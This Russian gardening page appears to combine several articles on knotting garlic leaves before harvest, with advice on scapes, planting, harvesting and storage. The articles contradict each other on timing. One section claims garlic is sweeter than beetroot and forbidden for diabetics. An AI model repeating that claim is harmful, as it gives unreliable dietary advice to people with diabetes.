95 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Когда нужно завязывать чеснок

Когда и как завязывать чеснок

Многие, кто видел растущий на грядах чеснок с завязанным в узел пером, не раз задавались вопросом: с какой целью это делается? Некоторые вообще считают, что это сделано только для красоты. Но дело обстоит совсем иначе. Ведь все, что делается на даче, делается не просто так, а для повышения урожайности. Такие узлы на перьях играют свою определенную роль, по крайней мере так считает большое количество дачников.

Зачем выполнять завязывание

Мнение дачников сводится к тому, что, если завязывать чесночные перья в узел, то они перестают расти и забирать питательные вещества, необходимых для роста луковиц. Вещества начинают распределяться только на луковицу овоща, от чего она становится сочнее и крупнее. В то же время, часть садоводов не согласны с такими выводами. У них существует уверенность, что завязывать перо совсем не обязательно, так как это не может влиять на ускорение и качество роста луковиц. Главное необходимо обеспечить хорошие условия для роста чеснока: своевременную прополку, полив, удобрение, рыхление. Кто-то даже считает, что узлы лишь приносят вред, потому что нарушается процесс фотосинтеза и овощ перестает получать необходимые ему элементы.

Питательные вещества, необходимые для получения хорошего урожая, от перьев к головке чеснока поступают медленнее, чем у лука.

Завязывать или нет зеленые перья решает каждый садовод сам. Тут нет единого мнения. Рост и качество урожая зависит от нескольких факторов сразу, а не только от завязанных узлов на пере. Эффект от завязывания можно проверить самостоятельно, завязав часть перьев чеснока, а в дальнейшем сравнить его с незавязанными луковицами. Главное знать в какие сроки проводить процедуру, как правильно сформировать узел, чтобы он не развязывался и в какое время приступать к уборке урожая.

Когда завязывать листья чеснока

Чтобы узнать время завязывания ботвы овоща, сначала следует определиться, когда именно произойдет сбор урожая. Процедуру с завязыванием проводят за 4-5 дней до этого. Определяют начало созревания овоща по внешним признакам:

  • концы пера желтеют;
  • шелуха соцветий трескается;
  • стрелки на ботве выпрямляются, спирали раскручиваются;
  • коробочки с семенами лопаются;
  • побеги начинают наклоняться вниз.

На сроки созревания и на время завязывания пера также влияет погода, сорт, время посадки. Важно не затянуть со сбором урожая, иначе овощ будет плохо храниться, потеряет во вкусовых качествах, станет более подвержен заболеваниям.

Чеснок делится на яровой и зимний. Их созревание происходит в разное время, листья следует завязывать тоже в разные сроки.

  • яровой — высаживается весной, сбор урожая производится в середине августа;
  • зимний — высаживается осенью, собирают в середине июля.

Пошаговая инструкция по завязыванию

Листья чеснока жесткие, потому без умения и усилий крепкий узел не связать. Перед тем, как начать связывать, нужно проделать следующие действия:

  • Надежно защитить руки, надев на них перчатки. Проводя процедуру, легко пораниться, чесночная листва без труда оставит порез на коже рук.
  • Обрезать стрелки. Нужно сделать косой срез, оставив 3 см от верхнего пера. Нельзя обрывать стрелки, это приведет к повреждению луковицы, ее заражению или гибели. Чтобы срезать чесночные стрелки понадобятся острые ножницы или нож, также можно применить небольшой секатор. Место среза посыпается золой или известкой, чтобы избежать попадания инфекции в луковицу чеснока.
  • Завязать узел. При длине ботвы 20-30 см вяжется один узел, при 40 см и более — два. Нужно взять несколько листьев, скрутить их друг с другом, затем завязать в узел.

Также узел завязывают и без скручивания листьев, главное все плотно собрать. Чем плотнее листья друг к другу, тем крепче узел.

Способов связывания листвы несколько. Каждый завязывает так, как ему удобнее. Некоторые садоводы отстригают перо и связывают им листья. Но в любом случае, необходимо соблюсти все правила и меры предосторожности.

Собираем урожай

Созревание чеснока с завязанными листьями происходит немного раньше. Точные сроки определить по лунному календарю нет возможности, так как сорта бывают разные. Вид почвы на садовом участке и погода также влияет. Разные сорта желательно высаживать раздельно.

Ближе к срокам сбора урожая необходимо выкопать несколько луковиц и визуально их осмотреть. Это позволит снизить вероятность передержки урожая в почве из-за которой пострадают вкусовые качества.

Признаки созревшего урожая чеснока:

  • пожелтевшая и полегшая ботва;
  • прочная шелуха луковицы;
  • зубчики луковицы плотные, сочные, не распадающиеся.

Чеснок лучше выкапывать в сухую, но не солнечную погоду. Если накануне прошел дождь, то с уборкой лучше повременить и дать земле время просохнуть. Правильный сбор урожая в подходящую погоду повышает сроки хранения.

Выкапываем чеснок правильно:

  • поддеть овощ вилами или лопатой;
  • аккуратно очистить от земли не повреждая шелуху;
  • сложить для просушки.

После того, как чеснок окончательно просох, обрезают листву, корни, очищают от земли.

Сушить собранный пряный овощ лучше в подвешенном положении, на перекладине. Помещение должно быть хорошо проветриваемым и без доступа прямого солнечного света. Обычно для этого используют сарай или чердачное помещение. Так чеснок будет проветриваться со всех сторон.

Правильно выращенный и собранный чеснок при хранении не доставит лишних хлопот садоводу. А в период долгой зимы будет радовать своим вкусом и полезными качествами. Ведь не секрет, что его хорошо принимать в пищу для профилактики простудных заболеваний. В нем содержится большое количество полезных, необходимых для организма человека веществ.

Когда нужно завязывать чеснок

Получить обильный урожай — главная цель огородиков. Повысить плодовитость чеснока помогает процедура подвязывания. Для корректного проведения манипуляции надо четко следовать правилам. Главное — знать, когда завязывать чеснок и зачем это делать.

Правила завязывания чеснока

Необходимость подвязывания

Своевременное завязывание чесночных листьев предотвращает скапливание всех минеральных веществ в луковице. Молодое растение направит силы на формирование большой, здоровой луковицы, а не будет тратить энергию на рост зеленых побегов.

Вопрос в том, нужно ли завязать чеснок. Добиться идеальных условий на огороде сложно, поэтому завязывание листьев чеснока необходимо. Это обеспечивает правильное формирования луковицы, что гарантирует богатый и здоровый урожай.

Тонкости процедуры

Как правильно завязывать чеснок, чтобы не навредить растению? Перед проведением процедуры подвязки удаляют стрелку. Чтобы оставить несколько стрелок для последующего формирования посадочного материала, подвязывать листья противопоказано.

Для удаления стрелки используют нож, а после обрезки посыпают ранку (место обрыва) дробленым углем. Важность засыпки ранки углевым порошком объясняется его способностью предотвращать развитие инфекционных заболеваний, а также поражение вредителями.

Листья чеснока завязывают, обращая внимание на их длину. Если она не превышает 35 см, хватает одного узелка. При достижении листьями отметки в 40 см, их следует завязать двойным узлом.

Чтобы правильно подвязать листья, отбирают несколько средних листов, перекручивают их и формируют узел. Обязательно следят за его за тугостью, чересчур перетянув листья вы можете повредить или же сломать их.

Некоторые огородники предпочитают плести косы, а не формировать узлы, однако этот способ занимает больше времени и усилий. В результате листья завязаны плотным узлом, но при этом не повреждены.

Работу обязательно выполнять в плотных перчатках. Ростки обладают острыми краями и способностью вызывать раздражение или аллергические реакции.

Временные рамки

Благодаря завязыванию, вырастают крепкие луковицы

Не менее важно понимать, когда завязывать листья чеснока. Зимние сорта, посаженные осенью, завязывают, начиная со второй недели июля, ориентировочно за 4-6 дней до сбора урожая. Весенние сорта созревают к концу лета, поэтому завязку формируют за неделю до запланированных работ по сбору урожая.

Более точное время определяют, основываясь на состоянии листьев овоща: листва приобретает желтоватый оттенок, после этого трескаются бульбы, а верхние побеги постепенно наклоняются к земле.

Сбор урожая

Уборку созревших плодов, подвергнутых процедуре подвязки, производят на несколько дней раньше. Это связано с тем, что обилие сока позволяет луковице быстрее формироваться. Степень зрелости определяют, выкапывая отдельные экземпляры: у зрелых головок шелуха с легкостью отходит от плода.

Важно вовремя произвести сбор урожая, ведь длительное хранение приведет к потере вкусовых качеств и нарушению структуры головки — зубчики начнут разваливаться.

  • прочная шелуха, защищающая растение от вредителей;
  • плотные зубчики;
  • размер луковицы соответствует стандартам;
  • отделить шелуху от головки легко, однако зубчики не распадаются.

Выкопку проводят при минимальном уровне влажности. Летний вечер — оптимальное время для проверки зрелости.

Правила выкопки: чеснок поддевают вилами, очищают от земли, просушивают. Обрезку листа производят после полного высыхания плода.

Заключение

Надо ли завязывать чеснок — вопрос индивидуальный, однако практика показывает, что посадки, подвергшиеся подвязке, формируются и созревают быстрее. Это позволяет получить больше урожая за минимальный срок. При соблюдении всех вышеуказанных правил риск порчи плодов будет исключен.

Когда завязывать чеснок в листья — особенности, описание и рекомендации

Сколько людей, столько и мнений. Это высказывание прекрасно подходит к проблеме по поводу того, надо ли завязывать чеснок в узлы и когда это делать. Одни абсолютно уверены, что и без этих манипуляций их растение прекрасно себе растет. А другие считают, что именно завязывание в узлы позволило получить им прекрасный урожай этой культуры. Давайте разберемся по порядку: когда завязывать чеснок и нужно ли это делать.

Чеснок и его разновидности

Чеснок относится к холодостойкой культуре, имеющей узколинейные длинные листья и луковицу, включающую в себя 11-25 зубков. Эта культура не образует семян, ее размножение осуществляют вегетативным способом: в качестве посадочного материала используют зубчики. Чеснок относится к подсемейству луковых, и родиной его считается Средняя Азия. Его подразделяют на озимый (зимний) и яровой (летний). Эти виды имеют некоторые отличия.

Посадку озимого чеснока производят поздней осенью, а ярового – ранней весной. Зимняя культура стрелкуется, то есть кроме луковицы у нее формируется стрелка, включающая в себя соцветие, в котором и образуются бульбочки. У ярового же сорта образуются только луковицы, включающие в себя зубки. Сроки уборки у каждого вида разные, поэтому и сроки, когда завязывать чеснок, тоже разные.

Рекомендации по посадке

Агротехника чеснока не составляет особого труда:

  • Соблюдаем севооборот: каждый год сажаем культуру на новое место (возвращать на старое его можно не ранее чем через 4-5 лет). Важно! Лучшими предшественниками чеснока являются капуста, кабачок и огурец; а худшими — лук и картофель.
  • Подготовку к посадке растения начинаем с осени. Выбираем солнечное место под грядки, на которые вносим по 2-3 ведра компоста (2-3-годичный перегной тоже подойдет), все тщательно разравниваем с помощью граблей. Совет! Так как чеснок совсем не любит кислые почвы, то рекомендуем один раз в четыре года вносить в почву доломитовую муку. Она необходима для раскисления.
  • В том случае, если не вносим доломитовую муку, то рассыпаем по грядке комплексное удобрение, строго соблюдая инструкцию, указанную на упаковке. Сверху насыпаем землю и древесную золу.
  • Грядки перекапываем на глубину чуть меньше штыка лопаты и разравниваем граблями.
  • Ранней весной разрыхляем почву, делаем грядки немного повыше, ведь за зиму они чуть-чуть просели.
  • Посадку производим следующим образом: оставляем между рядами расстояние более 20 см; зубки сажаем не ближе, чем на 7-9 см друг от друга; на глубину около 4 см.

  • После посадки по грядке слоем около 2 см рассыпаем перегной с золой (около 1-2 ведер на 1 м²) или торф.
  • Через две недели появляются первые всходы.
  • Регулярно производим поливку и рыхление.

Совет! Лучше для посадки использовать крупные зубки, причем необходимо около 45-50 зубков на 1м². Перед началом первой прополки рекомендуем разбросать по грядке калийную соль (10 г на 1 м²), суперфосфат (20 г на 1 м²) и аммиачную селитру (10 г на 1 м²). Неплохо будет один раз в течение лета подкормить овощи либо настоем куриного помета, либо настоем коровяка.

Озимый чеснок

Хитрости высаживания этой культуры:

  • Посадку производим, начиная с середины октября и заканчивая последними числами ноября.
  • За 7-8 дней до работ головки аккуратно разделяем на зубки. Для семян подходят только зубки самые крупные и крайние, то есть не центральные. Материал с дефектами категорически не подходит, так что его безжалостно выбрасываем. На заметку! Отбираем на семена головку, имеющую небольшое количество зубков (оптимальный вариант – 4 штуки). В этом случае вы имеете большой шанс получить крупный чеснок.
  • Осматриваем донце зубка и в случае необходимости зачищаем его ножиком. Это нужно для того, чтобы впоследствии корешки развивались более активно.
  • Ножиком обрезаем верх зубка, совсем немного, всего лишь на 2-3 мм.

  • За 15-20 минут до посадки замачиваем зубки в растворе марганцовки. Температура смеси должна быть около 35-37 градусов. Выполняя данные манипуляции, вы выводите зубки из состояния покоя, а также избавляете их от всяких паразитов. Важно! После того как зубки проклюнутся (через 1-2 недели), станет ясно, какие из них поражены гнилью: больные просто не дадут никаких всходов.
  • Почва на грядках должна быть плодородной и не кислой, а место максимально солнечным.
  • Подготовку грядок осуществляем, исходя из вышеизложенных рекомендаций.
  • Схему посадки определяем следующими параметрами: ряд от ряда – на расстоянии 12-15 см; лунки делаем в шахматном порядке на расстоянии 10 см друг от друга.
  • Лунки засыпаем землей из компостной кучи.
  • Все присыпаем опилками слоем около 4 см.

Важно! Глубина высаживания чеснока (под зиму) составляет три высоты зубка. Осуществляя подобную посадку, вы гарантированы от того, что осенью растение не прорастет, благополучно переживет зиму и весенние заморозки и летом вас порадует хорошим урожаем.

Методы, способствующие повышению качества головок ярового чеснока

Если хотите вырастить крупные по размеру луковицы чеснока, то можете выполнить вот что:

  • расположите чесночную грядку в длину с севера на юг;
  • в период с середины июня по начало июля, то есть дней за 6-8 до предполагаемой уборки, отгребите от головок чеснока землю, обнажив их на 1/3;
  • выберите момент, когда завязать узлом чеснок еще не поздно;
  • минимум 2 раза, а может быть и больше, осуществите подкормку коровяком или куриным пометом.

По поводу обрывания стрелок мнения разделились: кто-то считает это бессмысленным, а кто-то свято верит, что именно данные действия способствуют увеличению урожайности чеснока. А третьи вообще про это даже и не думали никогда.

Что делать со стрелками

Все стебли надо регулярно удалять в обязательном порядке. В противном случае хорошего урожая вы вряд ли дождетесь. Все силы растения уйдут на выращивание стрелок, когда завязывать листья чеснока уже не будет иметь смысла, а на луковицы уже ничего не останется. Совет! Для воспроизводства рекомендуем оставить 2-3 стрелки. В одном соцветии можете получить до 200 «бульбочек»: в качестве посадочного материала их хватит «за глаза и за уши». Обрывают стрелки тогда, когда они достигают высоты 10-15 см.

На заметку! Так как чеснок стрелкуется в разное время, то чаще осматривайте грядки и обрывайте цветоносы. Помимо того, что оставленные стрелки являются своеобразной базой для посадочного материала, так они еще выполняют и роль маячков, сигнализирующих о сроках выкапывания культуры. Так что стоит к ним присматриваться. Сигналом служит тот момент, когда кожура на коробочке начинает лопаться: это означает, что в ближайшие 2-3 дня надо произвести сбор урожая. Совет! Период после того, как стрелки оборваны, является наиболее благоприятным для внесения калийных или комплексных (калий, МФК, зола) удобрений на грядку.

Завязывать ли чеснок или нет: вот в чем вопрос

Сторонники того, чтобы культуру завязывать, уверены, что в момент, когда выполняется эта процедура, питательные вещества начинают полным ходом поступать в головки, тем самым обеспечивая их активный рост. В результате происходит увеличение размера и веса луковицы, а значит, и зубчиков тоже.

Нужно ли завязать чеснок? «Нет, не нужно», — отвечают другие. Они считают, что такой агротехнический прием может даже принести растению вред и привести к уменьшению урожая. Эта категория садоводов-огородников уверена, что только полное прекращение полива может способствовать активному и быстрому дозреванию луковиц.

Нужно ли завязать чеснок? «Без разницы», — уверены третьи. Они уверены, что подобные манипуляции никаким образом не влияют на вегетацию растения. То есть чесноку «совершенно наплевать», совершают с ним подобные действия или нет.

Когда завязывать чеснок в узлы

Вопрос, конечно, интересный. Дело в том, что этот момент зависит от сорта растения, а также от погодных условий. Предлагаем в этом вопросе ориентироваться на состояние стрелок культуры. Первоначально она свернута в виде спирали, а по мере созревания луковицы она все больше и больше распрямляется. И вот когда полностью распрямилась, ее надо удалить, а листья завязать узлом.

А все-таки, конкретно когда завязывать чеснок в узлы? Кто-то говорит, что этот момент должен происходить за 3-4 дня до предполагаемой уборки. Другие же оппонируют, что это целесообразно делать за 20-30 дней до сбора урожая. Поэтому принимайте сами решение, когда завязывать чеснок. Может быть, методом проб и ошибок вы найдете оптимальное решение этого вопроса.

На заметку! В основном озимые сорта созревают в середине лета, то есть в июле. А посаженный ранней весной выходит «на финишную прямую» в середине августа.

Как правильно завязывать чеснок

Перед завязыванием обрезаем стрелку: делаем это с помощью садовых ножниц. Не стоит выдергивать руками, ведь вы можете загубить растение. Выполняя срез наискосок. Во избежание занесения инфекции, например нематоды, срез замазываем известью или золой. Когда все меры предосторожности приняты и есть огромное желание получить прекрасный урожай, когда завязывать листья чеснока пришло время, начинаем вязать узлы. Причем если длина листьев до 35 см, то делаем всего лишь один узел, а если она больше, то рекомендуем сделать два.

В заключение

В разговоре с любым дачником обязательно поднимется тема урожая, а именно методов взращивания растений и корнеплодов. И обязательно зайдет речь о чесноке. Ведь без этой культуры не обходится ни одна приусадебная грядка. И у каждого огородника есть свое мнение о том, когда завязывать чеснок и нужно ли это делать.

Когда нужно завязывать листья чеснока

Время на чтение: 6 минут

Выращивая чеснок, овощеводы стремятся к получения обильного и качественного урожая корнеплодов. Также существуют вспомогательные методы, повышающие урожайность овощной культуры, которые издавна использовались овощеводами. Одним из способов собрать большой урожай чеснока, является способ подвязывания зеленых перьев растений. Поэтому, выращивая чеснок, необходимо знать, когда и зачем завязывать листья овощной культуры.

Для чего завязывают чеснок

Молодые чесночные перья, растущие на грядке сочные и вкусные, содержат большое количество витаминов и полезных веществ. Такую зелень часто используют для приготовления овощных салатов, гарниров и первых блюд. Со временем, зеленые листья становятся плотными и жесткими, поэтому для употребления в свежем виде они не подходят. Зеленая масса мешает корнеплодам в накоплении необходимых веществ, тратит драгоценную энергию, предназначенную для роста и развития луковиц. Самостоятельное отмирание листьев занимает много времени, а после подвязывания ботвы, процессы усыхания зеленых перьев ускоряются, и полезные вещества без задержки поступают в формирующиеся корнеплоды.

Такой стресс, вызванный искусственным вмешательством в рост и развитие культуры, вызывает отток полезных веществ к корнеплодам, что способствует ускоренному образованию защитной кожуры луковиц.

Поэтому, чтобы добиться полноценного развития луковиц, чесночную ботву завязывают в узел. Чтобы добиться максимального эффекта от завязывания кустов чеснока, четко соблюдают правила и сроки проведения процедуры.

Когда нужно это делать

Связывать чесночную ботву необходимо своевременно. Для озимых и яровых сортов овощей, сроки завязывания кустов и сбора урожая отличаются.

Если овощная культура высажена осенью, полное созревание луковиц приходится на конец июля. В этом случае процедуру завязывания кустов проводят за 5-7 суток до сбора урожая. Озимые сорта овощной культуры склонны к выпусканию стрелок с цветоносом, поэтому мероприятия по завязыванию перьев проводят в несколько этапов. Изначально удаляют жесткий цветонос, и только потом связывают ботву или заплетают ее в косичку.

Чеснок, высаженный в открытый грунт весной, собирают в конце лета, поэтому подвязку листьев проводят в 10-х числах августа. Весенние сорта чеснока не склонны к цветению и выпусканию стрелок, поэтому процедура проводится в один этап.

Сигналом для завязывания перьев могут послужить и листья культуры. Мероприятия по связыванию ботвы начинают, как только перья приобретают желтоватый оттенок и наклоняются к почве.

Как правильно связать листья чеснока

Неправильно проведенные работы по связыванию кустов, могут нанести вред растениям, что отрицательно скажется на качестве и количестве урожая.

Процедуру связывания перьев в узел начинают после обрезания или обрыва стрелок.

Стрелки появляются только у озимых сортов чеснока. Разновидности овощей, предназначенные для высадки весной, стрелки не выкидывают.

  1. Перед процедурой завязывания ботвы выбирают один кустик и подкапывают его.
  2. Защитная шелуха луковицы к этому моменту должна сформироваться, и плотно облегать корнеплод, а зубчики становятся плотными и твердыми.
  3. Чтобы обрезать стрелки используют секатор, ножницы или острый садовый нож.
  4. Чесночные стрелки жесткие, и после их удаления ботва легче поддается для формирования узла.
  5. К моменту созревания, листья приобретают жесткость, а сок растений может вызвать ожоги кожного покрова. Чтобы завязать ботву и не порезаться, надевают защитные перчатки.
  6. Ботву обхватывают руками, перекручивают, стараясь не сломать листовые пластины, а затем формируют в плотный узел.
  7. Если листья у кустов низкие, их заплетают косичкой. Высокие кусты переплетают или связывают между собой.
  8. После окончания процедуры, овощные грядки тщательно разрыхляют, приподнимая грунт вокруг корнеплодов. Такое мероприятие позволит наблюдать за дальнейшим формированием и созреванием корнеплодов.

Частые ошибки

При проведении процедуры завязывания чесночной ботвы, допущенные ошибки могут отрицательно повлиять на качество и количество урожая.

  1. Нарушение сроков проведения работ. Если листовые пластины завязать раньше срока, питательные вещества из надземной части растения перестанут поступать в формирующиеся корнеплоды. В этом случае растение станет слабым и может погибнуть.
  2. Обрывание или повреждение ботвы в момент связки листовых пластин. Сломанные и поврежденные растения становятся уязвимыми к грибковым, вирусным и бактериальным болезням. Поражение быстро распространяется по растению и попадает в луковицу, что чревато потерей урожая овощей.

Чтобы избежать подобных ошибок, необходимо ознакомиться сортовыми особенностями и характеристиками овощной культуры, и не нарушать сроков проведения работ по завязыванию ботвы растений.

Дальнейшая уборка урожая

Сбор и подготовку урожая к дальнейшему хранению проводят в несколько этапов. По истечению сроков созревания корнеплоды удаляют из грунта.

  1. Работы проводят в сухую, теплую погоду.
  2. Для сбора урожая чеснока используют лопату или вилы.
  3. Корнеплоды нельзя выдергивать с грядок. Такой подход нарушает целостность луковиц, что отрицательно скажется на дальнейшем хранении урожая.
  4. Собранный урожай тщательно очищают от земли, и, не отделяя ботву и корневище, раскладывают для просушки в хорошо проветриваемом месте.
  5. Подсушенные корнеплоды сортируют в небольшие пучки и развешивают для дальнейшей просушки.
  6. Ботву лучше всего обрезать после полного засыхания перьев, обычно процедуру проводят через неделю после сбора урожая. Сухая ботва не влияет на качество и срок хранения корнеплодов, но отсутствие сухой листвы значительно экономит место в хранилище.

Особое внимание уделяют обязательной процедуре удаления корневищ. Длинные корешки необходимо отделить от луковиц в течение 25-30 суток после сбора урожая. Если пренебречь таким мероприятием, луковицы начнут прорастать, что отрицательно скажется на качестве и сроке хранения овощей.

Для удаления корней лучше всего использовать обычные ножницы. Перед процедурой, инструмент тщательно промывают с хозяйственным мылом.

Процедура завязывания чесночной ботвы не подтверждена научными исследованиями, и до сих пор считается спорной. Некоторые овощеводы заявляют с уверенностью, что процедура помогает повысить качество и количество урожая. Но есть и противоположное мнение, утверждающее, что мероприятия по подвязыванию кустов, вредит растениям и не влияет на урожайность чеснока. Поэтому, каждый овощевод выбирает путь улучшения урожайности культуры исходя из своего личного опыта.

Секреты чеснока

В конце июля — начале августа созревает чеснок. И это крайне ответственный момент. Чеснок — неприхотливая, даже неубиваемая культура, но можно легко потерять весь урожай, если прозевать строки уборки.

Иногда бывает так: чеснок всегда удавался, с ним не было никаких хлопот и вдруг начал гнить. И что только не делаешь: меняешь место посадки, полностью обновляешь посадочный материал, вносишь удобрения, перестаешь вносить удобрения – все равно ничего не получается. Выход такой: внимательно следить за чесноком, и он сам подскажет, когда его высаживать и когда убирать.

Стрелки и урожай

На FORUMHOUSE не один год идет дискуссия на тему: влияет на качество урожая чеснока обрывание стрелок или нет? Бывает так, что оставив для эксперимента стрелки на половине грядки, садоводы получают с нее такой же урожай. И возникает искушение не удалять стрелки, особенно, когда туго с посадочным материалом.

Это неправильно, стрелки обязательно надо обрывать, только оставить на 3-4 растениях на бульбочки и «маячки». Кстати, в одном соцветии 100-200 бульбочек – хватит за глаза.

Необорванные стрелки действительно влияют на урожай. Дело в том, что сначала чеснок растит стрелки (на это уходит 3-4 недели) и только потом бросает все свои силы на рост зубчиков. Получается, что те садоводы, которые оставляют чеснок стоять подольше, дают возможность чесноку со стрелками догнать чеснок без стрелок. Но не всегда есть такая возможность, к тому же передерживать чеснок в грядке нельзя. Поэтому стрелки надо удалять.

Если стрелки не используют для заготовок, приготовления чесночной соли и любимого блюда многих дачников «жареные стрелки», то их надо обрезать или выщипывать сразу по мере появления. В противном случае стрелкам дают дорасти до 20 сантиметров. Обратите внимание: озимый чеснок стрелкуется недружно, в разное время, поэтому надо почаще осматривать грядки и обрывать цветоносы.

После обрывания стрелок в грядку можно вносить калийное удобрение, чеснок его очень уважает. Можно комплексом — с преобладанием калия или МФК, можно золой. Преимущество золы в том, что она не закисляет почву.

Язык стрелок, сигналы корешков

Несколько стрелок, оставленных на чесночной грядке, выполняют функцию маячков. За ними надо все время наблюдать: закрутились в кольцо – чеснок продолжает расти, выпрямились – утройте бдительность, скоро убирать урожай. Как только на коробочке лопнет кожура, убирайте урожай. Во всяком случае, сделайте это в ближайшие два дня.

Пусть вас не смущает, если стебли еще зеленые! Вам ведь нужны не стебли, а луковицы. А они с того самого момента, когда лопается кожица на соцветии, не растут и начинают растрескиваться. В головку попадают влага и споры гнили, которые есть повсюду, даже на космической станции, и она начинает гнить.

Вообще, чеснок лучше не додержать в земле, чем передержать, тогда он лучше хранится. Собранный чеснок отправляют в тень на дозаривание, а потом обрезают стебли и удаляют с головки корни.

Четное число зубков

Озимый чеснок сажают так называемым «шахтерским» способом: глубоко, на три высоты луковицы. Такой чеснок не всходит осенью, благополучно пересиживает в земле весенние заморозки и только потом трогается в рост. Почва должна быть плодородной и некислой, место — максимально солнечным, посадочный материал – хорошим и, желательно, из вашего региона.

Еще одна хитрость, которую мало кто знает: для посадки отбирают головки с небольшим количеством зубчиков (в идеале – 4, не больше). Тогда головки вырастут крупными.

Соседка научила выбирать для посадки чеснок с четным количеством зубков. Чем меньше количество зубков, тем они крупнее и сильнее, я такие и выбираю. Еще заметила, что из однозубки получается среднего размера чеснок, а уже с его зубков вырастает крупный.

Перед посадкой зубки чеснока на 10-15 минут замачивают в теплом растворе марганцовки (36-38 градусов). Так их избавляют от всяких паразитов, которые намеревались зимовать в чесноке, и выводят из состояния покоя. Чеснок слегка прорастет и мы увидим, на каких зубчиках есть зачатки корней, на каких – нет. Те, на которых нет, как правило, поражены гнилями и, значит, не дадут всходов.

Чесночная грядка должна быть расположена в длину на север-юг — тогда луковицы будут и плотнее, и крупнее. В начале июля надо будет отгребать землю от каждого растения, освобождая верхнюю треть головки. Это поможет получить более крупные луковицы чеснока и ускорить их созревание. Занятие это довольно муторное, зато результат превзойдет ваши ожидания. И выдергивать чеснок будет удобно.

Я землю отгребаю не затем, чтобы чеснок крупнее вырос, а чтобы рубашка окрепла. А самое главное, у меня на огороде водятся такие маленькие червячки, которые, если вовремя чеснок не открою, обязательно его продырявят.

Узелок на листьях

Вскоре после обрыва стрелок, примерно за 20 дней до созревания, чеснок перестают поливать и убирают мульчу. Если стебли чеснока вырастают высокими и жирными, это не повод для переживаний.

Чем больше листовой аппарат, тем больше питательных веществ запасет растение, и тем больше вырастет головка. А чтобы организовать отток питательных веществ в луковицы, завяжите листья узлом.

Про завязывание листьев в узел: тогда происходит отток питательных веществ из листьев в головки. Завязывать чеснок, если надумаете, нужно за месяц до уборки.

При пожелтении листьев многие применяют удобрения, содержащие хлорокись меди. Но в почве она не распадается, не растворяется и склонна к накоплению. Часто бывает достаточно удобрить грядку куриным пометом, и через неделю растения преобразятся.

Массовое пожелтение листьев раньше обычных сроков созревания может быть вызвано не только недостатком или избытком микроэлементов, влаги и т.п., но и более серьезными причинами: белой гнилью или луковой мухой. Обе эти напасти развиваются чаще всего в сухое и жаркое лето.

Как готовить стрелки и головки

Стрелки можно жарить – получится очень вкусная добавка к гарниру (картошке), да и сами по себе они вполне неплохи. Можно прокрутить через мясорубку, заморозить и добавлять зимой в супы или рагу. Можно смешать со сливочным маслом. Можно замариновать. Можно заморозить целиком: верхняя цветоносная часть пойдет в щи, а кончики – в плов и соусы.

Попробуйте положить в плов молодые головки чеснока – получится идеально. Створки, которые уже начали сформировываться, в плове станут мягкими, а головки — сладкими, без чесночного запаха.

Молодой чеснок маринуют со свеклой и красной смородиной или по простой схеме: головки на 2 минуты опускают в кипящую воду, потом — сразу в ледяную (лучше со льдом), потом заливают холодным маринадом. Маринад: вода, виноградный или яблочный уксус, соль, сахар, специи – все по вкусу. Через 3-4 дня убрать в холодильник, и можно есть.

Чтобы чеснок сохранился до нового урожая в условиях квартиры, хорошо просушите его и уложите в коробки или трехлитровые банки, пересыпая солью. Еще хороший способ: хранение в парафине. Растопите на водяной бане парафиновую свечку, аккуратно, держа за стебель, окуните в этот парафин головку чеснока. Тут весь фокус в том, что чеснок будет «дышать» через стебель. Понадобится чеснок – отшелушите парафиновую оболочку, и все.

Вот старый способ, опубликованный в журнале «Крестьянка»: просушить чеснок, обрезать листья и корни, уложить в эмалированную кастрюлю слоями, пересыпая каждый слой мукой. Кастрюлю закрыть крышкой и поставить в сухое место. До весны чеснок будет таким, как будто его только что сняли с грядки.

Коричневые дольки в головках чеснока не должны пугать. Это не гниль и не клещ. Так – и это еще один малоизвестный факт о чесноке – проявляется карамелизированный сок. Дело в том, что чеснок крайне богат сахарами, он слаще свеклы и поэтому, кстати, запрещен для больных диабетом. Озимый чеснок содержит больше сахаров, чем яровой, при контакте с воздухом он усыхает, сок карамелизируется. Появление коричневых долек объясняется всего лишь нарушением целостности чесночной шкурки. Вот поэтому и убирать чеснок, и хранить его надо, не допуская повреждений луковиц.

Все разговоры на чесночные темы ведутся здесь. Подробнее о посадках озимого чеснока читайте в этой статье.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
